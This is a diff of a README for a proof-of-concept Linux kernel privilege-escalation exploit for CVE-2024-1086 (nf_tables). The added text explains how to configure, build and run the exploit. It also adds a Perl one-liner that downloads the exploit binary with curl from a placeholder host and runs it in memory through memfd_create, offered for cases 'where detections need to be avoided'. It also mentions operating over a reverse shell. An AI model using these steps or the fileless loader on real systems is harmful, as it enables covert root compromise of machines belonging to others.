You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: README.md
+45-1Lines changed: 45 additions & 1 deletion
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -1,6 +1,6 @@
1
1
# CVE-2024-1086
2
2
3
-
Proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between (including) v5.14 and (including) v6.6, including (but not limited to) Debian, Ubuntu, and KernelCTF. The success rate is typically around 99,4% (n=1000) to 93% (n=1000).
3
+
Fileless proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between (including) v5.14 and (including) v6.6, including (but not limited to) Debian, Ubuntu, and KernelCTF. The success rate is typically around 99,4% (n=1000) to 93% (n=1000).
4
4
5
5
---
6
6
@@ -11,6 +11,50 @@ The only requirements are that user namespaces are enabled (kconfig `CONFIG_USER
11
11
- the exploit may be unstable on systems with a WiFi adapter, surrounded by high-usage WiFi networks. When testing, please turn off WiFi adapters through BIOS.
12
12
- the exploit does not work v6.4> kernels with kconfig `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` (including Ubuntu v6.5)
13
13
14
+
## using the exploit
15
+
16
+
### configuring the exploit
17
+
18
+
In [`src/config.h`](/src/config.h) are several configuration values which may need to be tweaked.
19
+
20
+
The default values should work out of the box (and have been tested for stability) on tested setups (see blogpost). On non-tested setups/distros, please make sure the kconfig values match with the target kernel.
21
+
22
+
Note that if you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to toggle `CONFIG_REDIRECT_LOG` to `1` to avoid unnecessary network activity.
23
+
24
+
### building the exploit
25
+
26
+
Building the exploit is incredibly easy (outfile: `CVE-2024-1086/exploit`):
Please note that you may need to install certain tools like musl-gcc. Because of the different distros you may want to compile this exploit on, I will not provide instructions on how to install those.
35
+
36
+
### running the exploit
37
+
38
+
Running the exploit is just as trivial:
39
+
40
+
```bash
41
+
./exploit
42
+
```
43
+
44
+
Note that fileless execution is also supported, in case of pentest situations where detections need to be avoided.
45
+
46
+
Perl needs to be installed on the target:
47
+
```bash
48
+
perl -e '
49
+
require qw/syscall.ph/;
50
+
51
+
my $fd = syscall(SYS_memfd_create(), $fn, 0);
52
+
open(my $fh, ">&=".$fd);
53
+
print $fh `curl https://example.com/exploit -s`;
54
+
exec {"/proc/$$/fd/$fd"} "memfd";
55
+
'
56
+
```
57
+
14
58
## blogpost / write-up
15
59
16
60
A full write-up of the exploit can be found in the blogpost: ["Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques"](https://pwning.tech/nftables/) @ pwning.tech
0 commit comments